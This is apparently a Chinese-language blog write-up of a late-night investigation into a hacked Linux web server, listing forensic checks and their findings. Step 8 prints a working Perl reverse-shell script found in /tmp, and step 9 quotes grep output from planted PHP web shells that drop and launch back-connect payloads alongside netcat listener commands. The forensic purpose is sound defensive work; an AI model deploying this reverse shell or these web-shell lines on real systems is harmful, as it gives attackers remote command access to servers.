Web伺服器捉蟲速記

web

伺服器捉蟲速記

馬上登入伺服器（半夜好睏啊）。執行如下的步驟： 1、

檢查系統帳號，看有沒有異常帳號

--如冒充系統帳號，改乙個字母，看起來像系統帳號，混淆視聽。有的傢伙狡猾的幹活，建立個帳號為「

…」極端不易察覺。 2、

檢查最近登入使用者的ip：

last 檢視9

月9號以後到目前的情況，經確認，有乙個

ip來路不對。 3、

檢查系統初始化檔案

inittab,

執行級別為

3，為發現異常。一些

hacker

喜歡在這裡下手，加上

respawn

這樣的行，保證他的程式被殺後自動重啟，不屈不撓地抗爭系統管理員的絞殺。 4、

檢查執行級別目錄的指令碼，

ls –al /etc/rc3.d ,

未見異常。 5、

檢查自動任務

crontab –l

，root

使用者和web

執行使用者

www各檢查一遍，未見任何異常。 6、

檢查歷史記錄

history

發現有安裝

sendmail

的情形，問客戶是否有這個，答：不是自己裝的。 7、

檢查web

目錄，發現其許可權為

777，這可讓人不太放心了，心中猜想，可能是從這裡下手了。 8、

檢查一下目錄

/tmp,

發現有個檔案不太對勁，檔名是

spider_bc

，開啟看一下，是個

perl

指令碼，其內容為：

[root@localhost mysql]#more /tmp/spider_bc

#!/usr/bin/perl

use socket;

$cmd= "lynx";

$system= 'echo "`uname -a`";echo"`id`";/bin/sh';

$0=$cmd;

$target=$argv[0];

$port=$argv[1];

$iaddr=inet_aton($target) || die("error: $!\n");

$paddr=sockaddr_in($port, $iaddr) || die("error: $!\n");

$proto=getprotobyname('tcp');

socket(socket, pf_inet, sock_stream, $proto) || die("error: $!\n");

connect(socket, $paddr) || die("error: $!\n");

open(stdin, ">&socket");

open(stdout, ">&socket");

open(stderr, ">&socket");

system($system);

close(stdin);

close(stdout);

close(stderr);

據客戶開發人員反應，這檔案刪除以後，一會又自動生成了。 9、

初步懷疑是

hacker

利用web

許可權設定及程式漏洞上傳了程式後，自動生成這個檔案，於是進入到**根目錄，然後執行

grep –r 「spider」 * ,

片刻，結果出來了，下面節錄部分：

[root@localhost www]#grep spider_bc * -r

/plusbak/viev.php: echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '

建立/tmp/spider_bc

成功' : '

建立/tmp/spider_bc

失敗';

/plusbak/viev.php: echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/plusbak/viev.php: echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '

建立/tmp/spider_bc.c

成功' : '

建立/tmp/spider_bc.c

失敗';

/plusbak/viev.php: @unlink('/tmp/spider_bc.c');

/plusbak/viev.php: echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/fckeditor/editor/skins/images/images.php: echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '

建立/tmp/spider_bc

成功' : '

建立/tmp/spider_bc

失敗';

/developers/fckeditor/editor/skins/images/images.php: echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/fckeditor/editor/skins/images/images.php: echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '

建立/tmp/spider_bc.c

成功' : '

建立/tmp/spider_bc.c

失敗';

/developers/fckeditor/editor/skins/images/images.php: @unlink('/tmp/spider_bc.c');

/developers/fckeditor/editor/skins/images/images.php: echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/developers/cache/default/index_sql.php : echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '

建立/tmp/spider_bc

成功' : '

建立/tmp/spider_bc

失敗';

/developers/developers/cache/default/index_sql.php : echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/developers/cache/default/index_sql.php : echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '

建立/tmp/spider_bc.c

成功' : '

建立/tmp/spider_bc.c

失敗';

/developers/developers/cache/default/index_sql.php : @unlink('/tmp/spider_bc.c');

/developers/developers/cache/default/index_sql.php : echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗';9

、問題基本查明，告知各方，先簡單恢復，明日再戰。

Web伺服器捉蟲速記

Web伺服器捉蟲速記

Web伺服器捉蟲速記

web伺服器 簡單web伺服器實現

相關推薦

web伺服器簡單web伺服器實現